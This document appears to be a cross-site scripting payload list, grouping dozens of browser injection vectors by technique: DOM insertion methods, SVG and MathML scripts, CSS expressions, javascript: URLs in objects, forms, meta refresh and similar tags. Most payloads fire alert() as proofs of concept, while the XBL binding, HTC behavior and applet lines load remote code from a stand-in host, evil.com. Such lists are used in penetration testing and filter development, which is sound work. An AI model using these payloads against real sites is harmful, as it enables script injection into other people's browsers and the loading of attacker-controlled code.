<script>document.body.insertAdjacentHTML('beforeend','<script>alert(\'XSS\')</script>')</script>

# createRange and createContextualFragment
<script>var range=document.createRange();range.selectNode(document.body);var fragment=range.createContextualFragment('<script>alert(1)</script>');document.body.appendChild(fragment)</script>

# importNode
<script>var doc=new DOMParser().parseFromString('<script>alert(1)</script>','text/html');var node=doc.importNode(doc.documentElement,true);document.body.appendChild(node)</script>

# adoptNode
<script>var doc=new DOMParser().parseFromString('<img src=x onerror=alert(\'XSS\')>','text/html');var node=document.adoptNode(doc.documentElement);document.body.appendChild(node)</script>

# cloneNode with innerHTML manipulation
<script>var div=document.createElement('div');div.innerHTML='<script>alert(1)</script>';document.body.appendChild(div.cloneNode(true))</script>

# execCommand (deprecated but works in some contexts)
<script>document.execCommand('insertHTML',false,'<img src=x onerror=alert(\'XSS\')>')</script>

# Design mode
<script>document.designMode='on';document.write('<script>alert(1)</script>')</script>

# ContentEditable
<div contenteditable="true" onblur="this.innerHTML='<img src=x onerror=alert(1)>'">Edit me</div>
<div contenteditable="true" oninput="this.innerHTML='<script>alert(\'XSS\')</script>'">Type here</div>

# SVG with script execution
<svg><script>alert(1)</script></svg>
<svg><script>document.write('<img src=x onerror=alert(\'XSS\')>')</script></svg>

# MathML with script execution
<math><script>alert(1)</script></math>
<math><maction actiontype="statusline#http://evil.com" xlink:href="javascript:alert('XSS')">Click</maction></math>

# XBL binding (Firefox)
<div style="-moz-binding:url('http://evil.com/xbl.xml#xss')">XSS</div>
<div style="-moz-binding:url(data:text/xml,%3Cbindings%20xmlns%3D%22http%3A%2F%2Fwww.mozilla.org%2Fxbl%22%3E%3Cbinding%20id%3D%22xss%22%3E%3Cimplementation%3E%3Cconstructor%3Ealert(1)%3C%2Fconstructor%3E%3C%2Fimplementation%3E%3C%2Fbinding%3E%3C%2Fbindings%3E)">Test</div>

# HTC behavior (IE)
<div style="behavior:url(http://evil.com/xss.htc)">XSS</div>

# CSS @import with JavaScript
<style>@import "javascript:alert(1)";</style>
<style>@import url("javascript:alert(\'XSS\')");</style>

# CSS expression with DOM
<style>body{background:url("javascript:alert(1)")}</style>
<div style="background:expression(eval('alert(\'XSS\')'))">Test</div>

# Link with href manipulation
<a href="#" onclick="this.href='javascript:alert(1)'">Click</a>
<a href="javascript:void(0)" onmouseover="this.href='javascript:alert(\'XSS\')'">Hover</a>

# Map with area manipulation
<map name="xss"><area shape="rect" coords="0,0,100,100" href="javascript:alert(1)"></map>
<img usemap="#xss">

# Object with data manipulation
<object data="javascript:alert(1)"></object>
<object data="about:blank" onerror="this.data='javascript:alert(\'XSS\')'"></object>

# Embed with src manipulation
<embed src="javascript:alert(1)">
<embed src="about:blank" onerror="this.src='javascript:alert(\'XSS\')'">

# Applet with archive
<applet archive="http://evil.com/xss.jar" code="xss.class"></applet>
<applet code="javascript:alert(1)"></applet>

# Meta with content manipulation
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="Link" content="<javascript:alert('XSS')>; rel=stylesheet">

# Form with method and action
<form method="post" action="javascript:alert(1)"><input type="submit"></form>
<form action="javascript:alert(\'XSS\')"><button>Submit</button></form>

# Button with formaction
<button form="test" formaction="javascript:alert(1)">Click</button>
<form id="test"></form>
<button formaction="javascript:alert(\'XSS\')">Submit</button>

# Input with type image
<input type="image" src="javascript:alert(1)">
<input type="image" formaction="javascript:alert(\'XSS\')">

# IsIndex with action
<isindex action="javascript:alert(1)" type="submit">
<isindex action="javascript:alert(\'XSS\')">